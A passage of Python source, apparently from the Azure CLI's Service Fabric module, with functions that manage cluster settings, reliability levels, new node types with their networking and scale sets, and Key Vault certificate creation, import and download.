return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
cli_ctx = cmd.cli_ctx
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'Standard_D15_v2' or vm_sku.lower() != 'Standard_G5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("{} already exists in the cluster")
cluster.node_types.append(NodeTypeDescription(name=node_type,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(
capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
DEFAULT_APPLICATION_START_PORT, DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(DEFAULT_EPHEMERAL_START, DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(poller)
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type.lower(), index)
dns_lable = '{}-{}{}'.format(cluster_name.lower(),
node_type.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type.lower(), index)
poller = network_client.public_ip_addresses.create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(dns_lable)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name='NIC-{}-{}'.format(node_type.lower(), node_type.lower()),
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name='Nic-{}'.format(node_type.lower()),
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
vmss = [vm for vm in vmsses
if len([e for e in vm.virtual_machine_profile.extension_profile.extensions if e.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]) > 0]
vmss = vmss[0]
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(storage_name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(Sku(SkuName.standard_lrs),
'storage',
location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Microsoft.Azure.ServiceFabric'
offer = 'UbuntuServer'
version = '6.0.11'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type
fabric_ext.settings['durabilityLevel'] = durability_level
if fabric_ext.settings['nicPrefixOverride']:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name,
node_type,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(
vm_sku, vm_tier, capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(
mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
return client.get(resource_group_name, cluster_name)
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if certificate_file is not None:
vault_name = _get_vault_name(resource_group_name, vault_name)
logger.info("Creating key vault")
vault = _create_keyvault(
cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if vault_name is None:
vault_name = resource_group_name
logger.info("Creating key vault")
vault = _create_keyvault(
cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
policy = _get_default_policy(certificate_subject_name)
logger.info("Creating self-signed certificate")
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is not None:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None:
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
else:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(secret_url, 'my'))
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(SubResource(vault_id),
new_vault_certificates))
poller = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, vault_id, secret_url):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
if vmsses is not None:
for vmss in vmsses:
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
def _get_resource_group_name(cli_ctx, resource_group_name):
try:
resouce_client = resource_client_factory(cli_ctx).resource_groups
return resouce_client.get(resource_group_name)
except Exception as ex: # pylint: disable=broad-except
error = getattr(ex, 'Azure Error', ex)
if error != 'ResourceGroupNotFound':
return None
else:
raise
def _create_resource_group_name(cli_ctx, rg_name, location, tags=None):
from azure.mgmt.resource.resources.models import ResourceGroup
client = resource_client_factory(cli_ctx).resource_groups
parameters = ResourceGroup(location=location, tags=tags)
client.create_or_update(rg_name, parameters)
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if size > 0 and size < 3:
return 'None'
if size >= 3 and size < 5:
return 'Bronze'
if size >= 5 and size < 7:
return 'Silver'
if size >= 7 and size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(k, parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(kk, vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(cli_ctx,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cli_ctx)
if validate_only:
return client.deployments.validate(resource_group_name, deployment_name, properties, raw=no_wait)
deploy_poll = client.deployments.create_or_update(resource_group_name, deployment_name, properties, raw=no_wait)
result = LongRunningOperation(cli_ctx)(deploy_poll)
return result
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(resource_group_name):
certificate_name = resource_group_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
return "{}{}".format(certificate_name, suffix)
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name == vault_name]
return vault[0]
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(subject):
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(subject)
def _default_certificate_profile(subject):
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
cert_attrs = CertificateAttributes(not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
_create_self_signed_key_vault_certificate.__doc__ = KeyVaultClient.create_certificate.__doc__
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token))
return client
def _create_keyvault(cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=KeyVaultSkuName.standard.value,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
